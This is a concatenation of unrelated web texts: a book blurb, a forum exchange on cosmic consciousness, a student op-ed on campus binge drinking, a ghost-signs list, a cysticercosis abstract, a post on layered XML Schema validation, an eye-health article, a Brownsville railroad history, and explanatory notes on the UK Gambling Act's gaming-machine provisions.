Mastering Successful Work Mastering Successful Work by Tarthang Tulku, was created to help readers live cheerfully, work with good results, and profit from knowledge in any circumstance. Offering clear, powerful guidance on how to make work into a path of transformation and dynamic realization, Mastering Successful Work sets forth principles and practices that apply to almost everyone and to virtually every discipline. For those who have been successful, it offers opportunities to discover a quality in work that gives a new sense of meaning. - Part One sets forth central themes of knowledge, time, and awareness - Part Two introduces structures for accomplishment: paying attention, taking responsibility, discipline, communication, and sharing knowledge. - Part Three presents exercises for transforming attitudes and approaches: recognizing and overcoming negative patterns. - Part Four includes more advanced supplemental exercises, leading up to tools for transformation, and concluding with a list of good business practices. Together, the motivation chapters and the exercises have a structure and progression that can be followed by individuals working on their own or incorporated into Skillful Means seminars and programs. More than 80 exercises that can be done on-the-job are included.
Have you, by chance, read or looked into Tom Campbell's book, "My Big Toe"? He has a wonderful theory regarding that very question. He posits that everything is "consciousness", and our individual consciousness is just a part of the whole in order to interact with itself with the primary goal of lowering our entropy. It's a really great read and really opens one's mind to the possibilities.

No, but I will look into it! This is my current view on the conscious universe theory. I'm making an assumption here as I haven't looked into his specific theory yet, which is naughty of me, but.... ....is it the same as the popular belief now that the universe is a thinking entity, that re-orders itself to influence your fate? At face value, this theory doesn't sit well with me. Perhaps it did once, when I was much more spiritual in my approach, but that didn't really give me any useful answers, only more questions. Questions like this...

As I see it, consciousness is defined as an identity - a collection of experiences, beliefs, attitudes, and interpretation of sensory input. Anything that can freely receive and process data then willfully act on it is conscious, right? That includes humans and animals, and one day computers. So at this level of understanding, it seems like a big jump for the entire universe - a vast collection of independent inanimate bodies and conscious beings - to be able to behave willfully as one identity. It feels to me like invoking the idea of an omnipotent god, and then saying (s)he's in all of us. I realize my logic is reductionist but then again that works pretty well for us in many existing scientific models. If I were to argue pro this theory, I'd say that kidney cells don't know they're part of a kidney, so why should I know I'm part of a super-mega-conscious-being at least 14 billion years old? But I still have to ask, where is the giant kidney? How can we say it exists.... how did that leap come about?
I do accept that there is MUCH we don't know about the universe... there may be unidentified forces, many more dimensions, and exotic stuff we haven't found yet. So I would not say with 100% certainty that the universe isn't conscious, that would be foolish. But I do believe that this theory is somewhat mystical and that the current data shows no mechanism for it, and I find it unscientific (my core values) to take that leap of faith. But that's just me. Maybe that's what Tom Campbell's book is about? If you want to elaborate on the mechanism I'm all ears...
In college drinking culture, moderation does not exist. Approximately 20 percent of college students meet the criteria for alcohol use disorder. Additionally, a 2014 survey found that two-thirds of the 60 percent of college students who consumed alcohol in the past month engaged in binge drinking, a behavior that brings blood alcohol concentration to more than .08 g/dL. Students here are eager to boast about the “work hard, play hard” lifestyle that is fundamental to the Penn experience. They join countless clubs to build their resumes, crank out research papers at Van Pelt and ace calculus midterms. But the weekends start on Thursday along with students’ destructive drinking habits. The consequences of this behavior are no secret. Researchers estimate that 1,825 college students die per year from alcohol related injuries, 696,000 students are assaulted by another who has been drinking and 97,000 experience date rape or alcohol-related sexual assault. We have seen these statistics in action through the recent death of Pennsylvania State University student Tim Piazza and the Stanford University sexual assault case. Some of the Penn administration’s attempts to reduce the negative effects of binge drinking have been effective. For example, the University’s medical amnesty policy allows students to seek medical attention while under the influence without facing disciplinary repercussions, while MERT provides urgent care to those who have been affected by alcohol poisoning among other issues. Nevertheless, the administration needs to pay more attention to alcohol abuse on campus. Additionally, we as students must do our part to stop fostering an excessive drinking culture. The University recently convened a task force to help combat the dangers of excessive drinking, which has been the subject of much scrutiny. However, the task force has inadequately addressed this issue and only caters to the wealthy by raising the cost of partying. 
Additionally, aside from Quaker Peer Recovery, there are no groups on campus specifically designed to help those struggling with alcoholism or related issues. Administrators never fail to point students seeking help to Counseling and Psychological Services; however, they often must wait months for appointments. What the University fails to recognize is that, like so many of the issues students face, binge drinking demands immediate attention. College is stressful. Students are bombarded with exams, essays and readings that they must juggle with other responsibilities such as jobs and extracurriculars. The stress that is induced by these activities can often lead to heavy drinking. Alcohol consumption releases endorphins that stimulate an enhanced state of being. It can make people experience pleasurable sensations of relaxation and euphoria, and the extreme amount of pressure college students face often motivates them to binge drink as a means for recovery. This is not just a Penn problem; binge drinking plagues numerous American universities. But what makes Penn different is its glorified “work hard, play hard” mentality. In 2016, Business Insider awarded Penn the number one spot in their list of rankings entitled WORK HARD, PLAY HARD: The 30 most intense colleges in America; in 2014, Penn was named Playboy’s number one party school; and in the book “Students' Guide to Colleges: The Definitive Guide to America's Top 100 Schools Written by the Real Experts--The Students Who Attend Them,” some of the five most common terms students used to describe Penn included “work hard, play hard,” “high achieving” and “fun-as-hell.” Social skills and academic prowess hold equal importance. But there is a fine line between possessing these skills and taking pride in Penn’s reputation as the “social Ivy” where the ability to go out, get blackout drunk and wake up the next morning to do homework is applauded. 
The positive reinforcement of these mantras by students fuels the unhealthy behavior that runs rampant at Penn. On many occasions, students have called on the University to implement effective policies and form groups that will mitigate the consequences of excessive drinking. Undoubtedly, it is time for the administration to listen. Students should also refocus their attitudes by thinking differently about how rewarding binge drinking promotes a negative campus culture. “Work hard, play hard,” when taken to its extreme, is not something to brag about. ISABELLA SIMONETTI is a College freshman from New York. Her email address is firstname.lastname@example.org. “Simonetti Says So” usually appears every other Tuesday.
~~ What Is A GHOST ~~
What is a Ghost? The traditional view of ghosts is that they are the spirits of dead people that for some reason are "stuck" between this plane of existence and the next, often as a result of some tragedy or trauma. A ghost is a person or animal that died recently and doesn't realize that it is dead, and needs guidance to the other side. A poltergeist (German for "Knocking Spirit") is a person or animal that died and refuses to go away, causing a lot of trouble for anyone nearby.
The Signs of a Haunted House:
* Unexplained noises - footsteps; knocks, banging, rapping; scratching sounds; sounds of something being dropped.
* Doors, cabinets and cupboards opening and closing - most often, these phenomena are not seen directly. The experiencer either hears the distinct sounds of the doors opening and closing (homeowners get to know quite well the distinctive sounds their houses make) or the experiencer will return to a room to find a door open or closed when they are certain that it was left in the opposite position. Sometimes furniture, like kitchen chairs, is perceived to have been moved. Very rarely will the experiencer actually witness the phenomenon taking place.
* Lights turning off and on - likewise, these events are seldom seen actually occurring, but the lights are switched on or off when the experiencer knows they were not left that way. This can also happen with TVs, radios and other electrically powered items.
* Items disappearing and reappearing - say, your set of car keys, which you believe you placed in a spot you routinely place them. But they're gone, and you look high and low for them with no success. Some time later, the keys are found in exactly the place you normally put them. It's as if the object was borrowed by someone or something for a short time, then returned. Sometimes they are not returned for days or even weeks, but when they are, it's in an obvious place that could not have been missed by even a casual search.
* Unexplained shadows - the sighting of fleeting shapes and shadows, usually seen out of the corner of the eye.
* Strange animal behavior - a dog, cat or other pet behaves strangely. Dogs may bark at something unseen, cower without apparent reason or refuse to enter a room they normally do. Cats may seem to be "watching" something cross a room. Animals have sharper senses than humans, and many researchers think their psychic abilities might be more finely tuned also.
* Feelings of being watched - this is not an uncommon feeling and can be attributed to many things, but it could have a paranormal source if the feeling consistently occurs in a particular part of the house at a particular time.
* Feelings of being touched
* Cries and whispers
* Cold or hot spots - cold spots are classic haunting symptoms, but any instance of a noticeable variance in temperature without a discernible cause could be evidence.
* Unexplained smells - the distinct fragrance of a perfume or cologne that you do not have in your house. This phenomenon comes and goes without any apparent cause and may accompany other phenomena, such as shadows, voices or psychokinetic phenomena. Foul odors can happen in the same way.
Unbelievable!!!! But it's true
Volume 5 Supplement 1
Can we eradicate Cysticercosis?
© Franchard et al; licensee BioMed Central Ltd. 2011
Published: 10 January 2011
Man is the only known definitive host of the tapeworm Taenia solium and becomes a carrier by eating undercooked pork contaminated with “Cysticercus cellulosae” (cysticerci). Pigs act as the intermediate host and acquire cysticercosis by ingesting eggs or proglottids from human feces, which develop into cysticerci within tissue, mostly without causing clinical symptoms in the host. Cysticercosis occurs in man in a context of “fecal peril,” through ingestion of egg-contaminated soil, water or vegetation, or by auto-infestation. In theory, separation of swine from humans, good cooking practice and hygiene should lead straightforwardly to the eradication of the disease! However, cysticercosis is still a major public health problem in endemic regions, with more than 50 million infected people, and is now a re-emerging disease in industrialized countries due to human migration. It is also the second cause of seizures in tropical countries. So what are the pitfalls in cysticercosis control, and what can we do? Cysticercosis affects free-roaming pigs with access to sites contaminated with human feces. Development of good rearing practice guides will have a major impact. Only a few tools are available for ante-mortem diagnosis of porcine cysticercosis, and tongue palpation remains the most commonly used. Therefore, the development of a rapid diagnostic test, usable in villages, to test cattle will be the second weapon. However, this will need recombinant antigens. Diagnostic obstacles also affect human patients presenting with seizures. Scans and biological tests are not readily available, leading to the repeated treatment of patients. New target proteins are thus needed to develop these tests. With the sequencing of the T. solium genome, which will allow the identification and production of recombinant proteins, a new step in the right direction was made. Now, broad advocacy is needed to raise funds in order to get this strategy on track. Here we summarize the current state of the disease, practical issues linked to the organization of a feasible control system in developing countries, and new data available all over the world, in particular in Madagascar, to sustain this advocacy.
This article is published under license to BioMed Central Ltd. This is an open access article distributed under the terms of the Creative Commons Attribution License (http://creativecommons.org/licenses/by/2.0), which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.
Teach essential vocabulary in ten minutes a day with this cluster approach to help fourth grade students learn many semantically related words at once! This resource provides opportunities for students to explore and expand vocabularies, increase reading comprehension, and improve writing composition. Standards for College and Career Readiness are supported by assisting students' understanding of word relationships and nuances in word meanings. Lessons provided are simple and easy-to-use, activity results can be used for formative assessment, and digital resources include lessons and teacher resources. Shell Education - SEP51303 Quantity Available for Web Orders: 51 (Call 314-843-2227 to see if this item is available in the store in St. Louis.) Grade: Grade 4 Age: 8-10 years Hubbard Company - WAR91018
One thing I've done a few times for banking clients is to build systems for quality control and release of large sets of XML Schemas. Just as you check code before a release - compile it, test it, run style checks over it - you need the same kind of checking for XML Schemas. You test that they are valid Schemas, you regression test them using XML examples, you run style checks over them, and perhaps also generate code or other artefacts from them.

What you do, whether it's for Java/C# or for XML Schemas, is check some kind of IT resource using some set of rules. You can call it validation, but that's just a long word for checking. If you are checking XML documents using a set of structural/formatting rules defined by an XML Schema, you call it validation. People are used to validators that check XML and log errors, just as they are used to compilers that check code and log errors. It's a familiar, common model for how such tools work.

However, I've found that model to be a problem when building XML Schema checking frameworks. Why? One reason is that, with checks like style checks, today's disallowed style is tomorrow's allowed style, and vice versa. As organisations develop their XML Schemas over time, they adjust their style checks. Type extension or substitution groups might be banned today and allowed tomorrow. To build a flexible checking framework, you want to be able to quickly change the interpretation or the severity of a particular feature or style. This is why I found it best to break things up into three stages - "Interrogate, Report, Act":

- Interrogate. Understand the resource(s) you are checking: the structure, the formatting, the style, whatever you need to understand. Don't make any judgements at this stage - the judgements are the things you need to be able to change, so you don't want to embed them in the interrogations.
- Report. Put the results of your interrogations into a common reporting format. If you have XML Schema validation results, Schematron validation results, ad-hoc XQuery/XSLT validation results, and Schema compiler validation results (as an example), they won't all be in the same format. Some might be XML, others will be text. Getting them into a common format is important so that you can slice and dice your interrogation results, and display them in a consistent way that gives developers, testers and managers the most appropriate summaries. It also lets you add new results without impacting your presentation and drill-down code.
- Act. Once all interrogation results are in a common reporting format, make your judgements and perform any consequent actions. Throw exceptions, log errors or warnings, or choose to ignore particular results if that is what the system's users have configured (there can be good reasons for ignoring particular test results for particular resources - but for sanity, make sure you capture the reasons for doing so in the configuration information).

This is the layering of concerns that has worked well for me. I've used it for XML and XML Schemas, but it is a general approach that can be applied to any kind of validation or checking process. By not making a thumbs-up or thumbs-down judgement too early, you end up with a checking framework that is more easily configurable and extensible than it would otherwise have been.
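The three stages can be sketched in a few lines of Python. Everything here is illustrative - the `Finding` record, the rule identifiers and the policy table are hypothetical names, not part of any real framework - but it shows the key point: interrogation results carry no judgement, and severity lives in configuration that can change without touching the checks.

```python
from dataclasses import dataclass
from enum import Enum

# Stage 2 ("Report"): a hypothetical common reporting format - one record
# per finding, regardless of which tool (XSD validator, Schematron,
# ad-hoc XQuery/XSLT check) produced it.
@dataclass(frozen=True)
class Finding:
    resource: str   # the schema or instance file that was interrogated
    rule_id: str    # stable identifier for the check, e.g. "STYLE-007"
    message: str    # human-readable description, with no judgement attached

class Severity(Enum):
    IGNORE = 0
    WARNING = 1
    ERROR = 2

# Stage 3 ("Act"): severity is plain configuration data, not code, so
# today's banned style can become tomorrow's allowed style by editing
# this mapping rather than the interrogation logic.
POLICY = {
    "STYLE-007": Severity.ERROR,    # e.g. "type extension used"
    "STYLE-012": Severity.WARNING,  # e.g. "substitution group used"
}

def act(findings, policy, default=Severity.WARNING):
    """Apply configured judgements to judgement-free findings."""
    errors, warnings = [], []
    for f in findings:
        severity = policy.get(f.rule_id, default)
        if severity is Severity.ERROR:
            errors.append(f)
        elif severity is Severity.WARNING:
            warnings.append(f)
        # Severity.IGNORE: deliberately dropped - the reason for ignoring
        # it should be recorded in the configuration, as noted above.
    return errors, warnings

findings = [
    Finding("order.xsd", "STYLE-007", "complexType uses extension"),
    Finding("order.xsd", "STYLE-012", "element heads a substitution group"),
]
errors, warnings = act(findings, POLICY)
print(len(errors), len(warnings))  # prints "1 1"
```

Because `POLICY` is data rather than code, flipping a disallowed style to an allowed one is a one-line configuration edit (set its rule to `Severity.IGNORE`), which is exactly the flexibility the three-stage split is meant to buy.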
<urn:uuid:472f044d-83a7-48e0-93e3-060b0af42830>
CC-MAIN-2017-04
http://kontrawize.blogs.com/kontrawize/2010/06/interrogate-report-act-a-layered-approach-to-validation-checking.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00566-ip-10-171-10-70.ec2.internal.warc.gz
en
0.930442
735
1.835938
2
Vision Issues to Monitor in Your 40s, 50s, 60s, and Beyond

With each passing year, we gain more memories and more wisdom. (We hope!) But as we grow older, our bodies change too, including our eyes and vision. This process is natural, but it’s important to stay aware of age-related vision changes to keep our sight and health on track. If you’ve found yourself squinting at print or holding a book at arm’s length lately, you’re not alone. Difficulty seeing clearly for reading and close work is among the most common problems for those between the ages of 41 and 60.1

40 to 60

Starting in the early to mid-40s, most of us may experience presbyopia, a condition in which the lens in the eye becomes less flexible, making it more difficult to focus at close distances.1 Fortunately, you have many options for dealing with presbyopia. Reading glasses, for example, can be a simple answer. As you continue to age through your 50s, presbyopia typically becomes more advanced, but these changes often stop around age 60.1

Also, if you’re over 40, you’re more likely to develop eye health and vision problems if you have any of the following risk factors:1
- A family history of glaucoma (increased pressure in the eye can lead to vision loss) or age-related macular degeneration (loss of central vision)
- A visually demanding job or eye-hazardous work

In addition, medications prescribed for common health conditions such as high cholesterol, thyroid conditions, anxiety or depression, and arthritis can increase your risk for vision problems.1 Many medications, even antihistamines, can adversely affect your vision.1

If you’re over 60

As you reach your 60s and beyond, it’s important to watch for warning signs of age-related eye problems that could cause vision loss. Many eye diseases have no early symptoms, but early detection through regular eye examinations and treatment can help slow or stop their progression.
Here are some of the problems you and your eye doctor should watch for:2
- Age-related macular degeneration (AMD) – an eye disease that causes loss of central vision
- Diabetic retinopathy – a condition that occurs in long-term diabetes and may cause vision loss
- Retinal detachment – tearing or separation of the retina from the underlying tissue2
- Cataracts – clouding of the lens of the eye and a cause of vision loss
- Glaucoma – damage to the optic nerve and a cause of blindness
- Dry eye – lack of eye lubrication

Issues such as needing more light, difficulty reading, problems with glare, changes in color perception, and reduced tear production2 are signs that you should schedule an eye exam.

Look forward to the years ahead

Growing older brings changes, but it also brings the opportunity to enjoy all the people and experiences we’ve gathered over our lives. To help ensure optimal eye health, take care of your eyes today and in the years ahead with an annual eye exam. Because no matter what your age, when you see and feel your best, you’ll have the time of your life.

1American Optometric Association, “Adult Vision: 41 to 60 Years of Age,” 2010.
2American Optometric Association, “Adult Vision: Over 60 Years of Age,” 2010.

Information in this article is provided for informational purposes only and does not constitute medical or other professional advice. BCBSRI does not recommend or endorse specific services, providers, procedures, advice, or other information provided in this article.
<urn:uuid:cc22b457-f08e-46e8-8259-86f8a2bdb072>
CC-MAIN-2022-33
https://www.rhodeahead.com/health/vision-issues-monitor-your-40s-50s-60s-and-beyond
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573540.20/warc/CC-MAIN-20220819005802-20220819035802-00472.warc.gz
en
0.93747
776
2.390625
2
Southern Pacific Railroad Train Station, Brownsville, Texas

The coming of the Southern Pacific Railroad to Brownsville on November 14, 1927, before the station was built, was perhaps the most significant event associated with the site. The Rio Grande Valley had enjoyed a spectacular growth from 1900 to 1930. This growth can be attributed to two factors—the introduction of irrigation in 1898, and the coming of the railroad in 1905. The Missouri Pacific Railroad had entered this area in 1905, and on May 11, 1925, the Interstate Commerce Commission granted permission for the Southern Pacific to acquire the San Antonio and Aransas Pass Railway, which held a charter into the Valley. The completion of the Southern Pacific to its southernmost point in Brownsville was a major event. The driving of the golden spike was scheduled to coincide with the first annual South Texas Chamber of Commerce Convention. The City of Brownsville staged a celebration when November 14 was declared Southern Pacific Day. In an issue of the Brownsville Herald carrying notices dated Nov. 1 (from Ankora, Turkey, on the Mustapha Kamal Pasha; from Belgrade, Jugoslavia, concerning suspension of telegraph and telephone censorship which had been instigated as the result of a Carolist plot; and a possible visit to Brownsville of Ruth Elder, American aviatrix), there appears Mayor A. B. Cole's "PROCLAMATION" which stated: “On November 14th and 15th, the City of Brownsville will stage in connection with the South Texas Chamber of Commerce Convention a large celebration on the coming of the Southern Pacific Railroad to this city. We expect to have with us thousands of visitors, many of whom will be here for the first time. We are particularly anxious that Brownsville present a neat and attractive appearance and I, as Mayor of Brownsville, urge that property owners make special effort to clean up his or her premises, cutting all weeds, mowing lawns, etc.
The general good appearance of our city will leave a lasting impression on our visitors.” The crowd assembled in Washington Park, near the station, was the largest the town had ever seen. The Southern Pacific sent a duplicate of the Sunset Limited from Houston carrying H. M. Lull, Vice President, G. S. Waide, General Manager, and W. C. McConnick, General Passenger Agent. They also sent the special track-laying machine which made possible the rapid extension of the line from Harlingen to Brownsville. Although the station was not completed until later, the first scheduled passenger train entered Brownsville on November 10, 1927. (Brownsville Herald, November 1-15, 1927.)
<urn:uuid:84379e67-e0e9-4f06-a48b-216508b9f746>
CC-MAIN-2022-33
http://www.historic-structures.com/tx/brownsville/railroad_station.php
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572215.27/warc/CC-MAIN-20220815235954-20220816025954-00672.warc.gz
en
0.962985
548
2.671875
3
Part 10: Gaming Machines 574.Part 10 contains the main provisions of the Act on gaming machines. It sets out a definition of “gaming machine” together with the offences relevant to illegal use or manufacture of a gaming machine. Parts 5 and 8 of the Act deal with certain authorisations and entitlements to use gaming machines that arise from operating or premises licences respectively. This Part provides general provisions which apply to the use of any gaming machine, and includes regulation-making powers for the Secretary of State to set categories of machine and rules on use. 575.Manufacture, supply, maintenance, repair, installation and adaptation of a gaming machine are all regulated activities under this Part. 576.This Part applies to any gaming machine situated in Great Britain, or anything done in Great Britain in relation to a gaming machine, wherever that machine is situated (section 251). For example, a gaming machine manufactured in Great Britain, for export to another country, will be covered by the provisions in Part 10. Accordingly, a gaming machine technical operating licence under Part 5 of the Act will be available to manufacturers and suppliers who wish to cater for the overseas market. Such machines need not comply with the categorisation regulations under section 236 if the machines are for export. Machines supplied for use in Great Britain will need to comply with the requirements of Part 10, even if manufactured abroad. Section 235: Gaming machine 577.This section provides a definition of a gaming machine for the Act. It is significantly broader than the definition of gaming machine in section 26 of the Gaming Act 1968, which the Act repeals. The new definition accommodates developments in technology which have taken place since the 1968 Act. It also covers a wide range of gambling activities which can take place on a machine, and includes betting on virtual events. 
578.Subsection (1) defines a gaming machine as a machine that is designed or adapted for use by people to gamble (whether or not it can be used for other purposes). This is a wide definition. Subsection (3)(b) contains further detail about how the words “designed or adapted” are to be interpreted, particularly in relation to a computer. 579.Subsection (2) then sets out a number of exceptions to subsection (1) which ensure that the gaming machine definition does not capture certain specified types of machine. 580.The definition at subsection (1) does not depend on any concept of players depositing payments into the machine, or on the gambling activity being generated from within the machine itself (as opposed to being transmitted to the machine from other equipment). Nor is it restricted solely to gaming. To the extent that these were requirements under the 1968 Act, they are no longer part of the new definition. 581.The exclusions at subsection (2) provide that the following are not gaming machines: A domestic or dual-use computer which can be used for participating in remote gambling. The Secretary of State will prescribe the meaning of “domestic computer” and “dual-use computer” in regulations. The purpose of this exception is to exempt internet terminals and home computer equipment, which are not dedicated or specifically configured for gambling activities, from the definition of gaming machine. The mere fact that a home computer can be used to access gambling facilities should not render the computer a gaming machine. However, someone offering the public access to the internet, via terminals, and configuring them to encourage gambling, is making a gaming machine available for use (unless any other exception applies, such as betting on real events). 
The regulations to be made under this power will set out the relevant criteria for determining whether equipment is a domestic or dual-use computer, and can refer to matters such as the location of the computer, the software installed on the computer, and the circumstances in which the computer is used (subsections (2)(a), (3)(f) and (4)); A telephone or other communications device that can be used for remote gambling (other than a computer). The fact that, with modern technology, a telephone or interactive television can be used to participate in gambling will not render the equipment a gaming machine (subsection (2)(b)). This exception does not apply to computers; A machine which is designed or adapted for betting only on future real events. This exemption is designed to prevent equipment, such as automated betting terminals, through which people place bets on real, not virtual, events, from being counted as gaming machines. The event must be a future event at the time the machine is used, meaning that betting on pre-recorded activities, where the result is already known, is not exempt. The exempt equipment is not unregulated. Making it available as part of a business will be providing facilities for betting, and will require the relevant operating licences under the Act. However, in regulatory terms, these machines are not to be treated as gaming machines (subsection (2)(c)). A machine upon which someone enters a lottery. Provided that the machine does not determine the result of the lottery, or announces it only after a specified period, then such a machine is not a gaming machine. This means that if a machine only dispenses lottery tickets (for a draw that takes place completely independently of the machine), or vends lottery paper scratchcards, then the machine is outside the definition of a gaming machine.
If the machine announces the results of the lottery, as well as selling tickets to it, then the machine will not be a gaming machine provided a prescribed interval has elapsed between the sale of the ticket and the announcement of the result. The Secretary of State will determine the duration of the period by order. In no circumstances can the machine determine the result of the lottery (subsection (2)(d)). A machine for playing bingo which is used by the holder of a bingo operating licence, in accordance with conditions attached by the Commission. This is designed to exempt what is known as “mechanised cash bingo” equipment, which is used for playing real bingo games, but whose degree of computerisation or mechanisation means that it would otherwise be caught by the definition of gaming machine. The need for it to comply with Commission conditions ensures that the exemption is construed narrowly and not extended to any machine on which a virtual bingo game could be played (subsection (2)(e)); A machine for playing bingo prize gaming which is used by the holder of a gaming machine general operating licence (for an adult gaming centre or a family entertainment centre), in accordance with conditions attached to those licences by the Commission. This is designed to exempt equipment used for playing real prize bingo, in accordance with the terms of Part 13 of the Act. The need for it to comply with Commission conditions ensures that the exemption is construed narrowly and not extended to any machine on which a virtual bingo game could be played (subsection (2)(f)); A machine for playing bingo prize gaming which is used by an unlicensed family entertainment centre or pursuant to a prize gaming permit, in accordance with any Commission code of practice. This exemption is similar to that at subsection (2)(f), but applies to different types of operator who have prize gaming rights under Part 13 (subsection (2)(g)); A machine which is used for playing manual games of chance.
This is a machine which: is controlled or operated by someone employed to do so (e.g. a croupier spinning a roulette wheel); or is used in connection with a real game of chance which is controlled or operated by an individual (e.g. a computer terminal for staking on the outcome of a roulette wheel that is spun by a croupier) (subsection (2)(h)). In both these instances the equipment could be construed as a gaming machine under the broad definition, but the fact that it is operated as part of a real game of chance means that it is not to be regulated under the gaming machine provisions. Such equipment and activities will be regulated under other parts of the Act. A machine which is used for playing automated games of chance in a casino. This is equipment used for playing a real game of chance, pursuant to a casino operating licence, but which has no human involvement from the organisers of the casino game, and which is not linked to a game which does have such human involvement. For example, apparatus such as a roulette wheel which is completely mechanised, and works without the need for any croupier to rotate the wheel, spin the ball or accept stakes. This equipment is not a gaming machine provided it is used in accordance with Commission licence conditions. Section 174(6) contains further provisions in relation to this equipment in casinos. 582.These various exemptions prevent the broad definition of gaming machine from capturing equipment unintentionally. The definition in subsection (1) is intended to cover a gaming machine that is used for taking part in virtual gaming, virtual betting or a virtual lottery (where the draw is part of the activity determined by the machine). 583.Subsection (3) provides clarification about the characteristics of a gaming machine. 
Reference to part of a gaming machine includes computer software to be used in a gaming machine, but does not include a component of a gaming machine which does not influence the outcome of the gambling (subsection (3)(c)). This means that where a gaming machine technical operating licence is required for the manufacture, installation etc. of gaming machines, computer software intended for use in the machine is included within the licensing requirement. However, the plywood from which the machine is constructed is not. References to installing part of a gaming machine include installing computer software (subsection (3)(d)). This is required because machines can be configured or changed by the downloading of gambling software, without any need to physically interfere with the machine. 584.Subsection (5) allows the Secretary of State to make regulations concerning the sub-division of apparatus into individual gaming machines. It is no longer the case that a gaming machine will take the form of a stand-alone machine in the form of a traditional “fruit-machine”. A single computer can be linked to a number of player positions and offer each player the experience of playing a gaming machine, although the apparatus forms one large whole. To tackle the possibility of evasion of the Act’s regulation for gaming machines, this power allows rules to be made for calculating when a single piece of apparatus counts as more than one machine, and, in particular, can focus on the number of player positions available. These regulations will supplement other parts of the Act, where numerical limits are placed on the entitlements to make gaming machines available for use. Section 236: Gaming machines: Categories A to D 585.Gaming machines will be divided into categories, with different entitlements set out in the Act to use the various categories. 
This section requires the Secretary of State to define, in regulations, four classes of gaming machine, to be known as categories A, B, C and D. Category B may also be sub-divided into further sub-categories, and these regulations may identify to which sub-category of B machine an entitlement relates (subsections (1) and (2)). 586.The categorisation will refer to the particular facilities for gambling which are offered on the machine. In particular, under subsection (4), the regulations can specify: the maximum amounts that can be paid to use the machine; the value or nature of the prize delivered as a result of its use; the nature of the gambling for which the prize is used; or the types of premises on which it can be used. 587.These matters can be combined so that, for example, one category of machine could have different maximum use charges dependent on the nature of the prize offered by the machine. 588.Details of the proposed A to D categorisation of gaming machines is set out in the Regulatory Impact Assessment published alongside the Act. The intention is that Category D will have the lowest levels of charge and prizes, and that these will increase in value, up to Category A, which will be a machine with no limits as to charges and prizes. 589.Part 8 of the Act contains the principal commercial entitlements for different types of licensed gambling premises to use different categories of machines. Different permissions are also available under Part 12 of the Act, for clubs, miners’ welfare institutes, alcohol licensed premises and travelling fairs, and, also, pursuant to this Part, for family entertainment centres. Sections 237 to 239: Other definitions 590.These sections set out definitions for an adult gaming centre, a family entertainment centre, (including a licensed family entertainment centre), and a “prize” in relation to a gaming machine. 
Sections 240 & 241: Use and supply of machines 591.The Secretary of State can make regulations about the way in which gaming machines can operate. It will be an offence to make a gaming machine available for use if the machine does not comply with such regulations. 592.Under subsection (2), the regulations may provide, in particular, for rules about: The method by which payment may be made for use of the machine (i.e. whether coins, banknotes, smartcards, tokens or other methods can be used). It is a separate offence, under this Part, to supply, install or make a machine available which can be paid for by a credit card; The nature of, and arrangements for, receiving or claiming prizes; The rollover of stakes or prizes (i.e. the carry over of amounts paid or won to a subsequent use of the machine); The proportion of stakes or sums paid for use which must be returned as prizes; The display of information on or around the machine (e.g. information on minimum age of use); or Any other matter relating to the way that the machine works (e.g. whether it must operate randomly or not). 593.The Secretary of State may also make regulations about the supply, installation, adaptation, maintenance or repair of a gaming machine. 594.The penalty for making a machine available for use, in breach of these regulations, is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, or a fine up to level 5, or both. 595.Regulatory steps taken by the Commission, and any licence conditions it sets, must not conflict with these regulations. The Secretary of State can also identify matters about which licence conditions cannot be made in relation to machines. The Commission is empowered in Part 5 to set standards for gaming machines under section 96, and regulation of gaming machines is therefore a dual function of both the Secretary of State and the Commission.
Section 242: Making machine available for use 596.The principal offence of making a gaming machine available for use unlawfully is set out in this section. A person will commit an offence if he makes any gaming machine available for use unless: He holds an operating licence which permits such use; He holds a family entertainment centre permit; He holds a club gaming permit or a club machine permit under Part 12; He has appropriate permission for alcohol licensed premises under Part 12; He makes gaming machines available at a travelling fair as permitted by Part 12; or The machine offers no, or a limited, prize (as defined in this Part). 597.Under Part 3 of the Act it is a separate offence for a person to use premises for making a gaming machine available for use without the necessary authorisation or exemption, such as a premises licence or a Category D gaming machine permit. It will also be an offence under this section to make a gaming machine available for use if the machine does not comply with regulations made by the Secretary of State under section 240. 598.The penalty for this offence is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, and/or a fine up to level 5. Section 243: Manufacture, supply etc. 599.As well as setting requirements about the use of machines, the Act stipulates that various activities concerning the manufacture or supply of a gaming machine must also be regulated by the Commission. Under Part 5 of the Act, gaming machine technical operating licences are available for those wishing to manufacture, supply, install, adapt, maintain or repair a gaming machine. Failure to hold such an operating licence, when undertaking any of these activities, is an offence under this section. The penalty is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, and/or a fine up to level 5.
600.Exceptions from this offence exist: for those holding a single machine supply and maintenance permit under this Part; for machines exempted by regulations under section 248(2) (no prize); where the activities relate to a gaming machine that is for scrap; or where the supply is incidental to the sale or letting of a property. 601.This means that no operating licence is required where a machine is being broken up and no further use is made of it for gaming machine purposes, and where the machines are ancillary to the sale of a business which uses gaming machines. Any use, after sale, will continue to be subject to the other requirements of the Act. Section 244: Linked machines 602.It is an offence, under this section, for gaming machines to be linked so that they operate together, and the value of the prize available on one machine is determined to any extent by use of the other machine. There is one exception to this, which is that subsection (2) permits machines to be linked at licensed casino premises provided that all of the machines are situated on the same premises. Linkage of gaming machines in this way does not authorise casino licensees to offer maximum prizes in excess of those allowed for the category of machine being used. 603.No linking between licensed casino premises is permitted, but subsection (3) gives the Secretary of State power to lift this prohibition, subject to appropriate Parliamentary approval. 604.The penalty, upon conviction for this offence, is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, or a fine up to level 5, or both. Section 245: Credit 605.It is an offence for a person to supply, install or make available a gaming machine which allows payment to be made by means of a credit card. The penalty, upon conviction for this offence, is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, or a fine up to level 5, or both. 
